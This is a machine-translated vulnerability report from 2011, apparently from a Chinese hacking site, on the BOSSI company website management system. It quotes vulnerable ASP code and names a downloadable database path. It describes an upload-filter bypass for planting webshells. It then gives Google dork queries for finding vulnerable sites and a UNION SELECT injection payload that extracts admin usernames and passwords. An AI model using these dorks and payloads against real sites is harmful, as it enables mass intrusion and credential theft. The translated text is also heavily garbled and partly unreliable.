BOSSI company(enterprises)website administrative system injection&upload exploit-vulnerability warning-the black bar safety net

2011-06-14T00:00:00
ID MYHACK58:62201130865
Type myhack58
Reporter 佚名
Modified 2011-06-14T00:00:00

Description

BOSSI company(enterprises)website administrative system,Chinese / English bilingual version,the background in same page within while management added modified information within OF in the English content,the website's left column using the module, you can freely increase&delete,can not modify the code, so don't know to write a web page people can also have their own company(enterprise)website, the basic information in the background Management Add, Modify,site title, address, copyright, corporate post offices, collection of such information may be in the background of the"company information"in the management

---------------------------------------------------- Vulnerability: injection vulnerability

Vulnerability page: NewsInfo. asp,

Vulnerability code: if not isEmpty(request. QueryString("id")) then id=request. QueryString("id") else id=1 end if

Set rs = Server. CreateObject("ADODB. Recordset") rs. Open "Select * From Conews where id="&id, conn,3,3 'Record the number of visits rs("counter")=rs("counter")+1 rs. update nCounter=rs("counter")

id variable untreated directly into the sql query can be injected, with. d on the line

Page two: yeNewsInfo. asp

Vulnerability code:<% if not isEmpty(request. QueryString("id")) then id=request. QueryString("id") else id=1 end if

Set rs = Server. CreateObject("ADODB. Recordset") rs. Open "Select * From Yenews where id="&id, conn,3,3 'Record the number of visits rs("counter")=rs("counter")+1 rs. update nCounter=rs("counter") 'Define the content content=ubbcode(rs("content")) %>

Principle above, can be injected.

Vulnerability two: database download vulnerability

Database address: Database/DataShop. mdb

For the establishment of the downloaded table, can be any to download!

Vulnerability three: upload vulnerability

Vulnerability page: upfile. asp, upfilea. asp

Problem code: fileExt=lcase(file. FileExt) Forumupload=split(UpFileType,"|") for i=0 to ubound(Forumupload) if fileEXT=trim(Forumupload(i)) then EnableUpload=true exit for end if next if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then EnableUpload=false end if if EnableUpload=false then msg="this file type not allowed to upload!\ n\n only allow the upload of several file types:" & amp; UpFileType founderr=true end if

And that good fine upload vulnerabilities, don't know who copied who's code! Registered users local upload php Malaysia or added whitespace filter to upload asp Malaysia, the specific method I will not say, in the analysis of Liang precision enterprise website management program one mentioned in the text. Will not repeat it!

Exploit: injection, Google for: inurl:yeNewsInfo. asp? Id

Injected statement:%20and%2 0 1=2%20union%20select%2 0 1,username,3,4,password%20from%20Bs_User

!

Or. d: the need to manually add the table segment: Bs_User

!

Database vulnerabilities:

Excavator: keywords: inurl:yeNewsInfo. asp? Id

Suffix: Database/DataShop. mdb

!

About upload exploits, I'm not the demo, can be with reference to the analysis of Liang precision enterprise website management system vulnerabilities.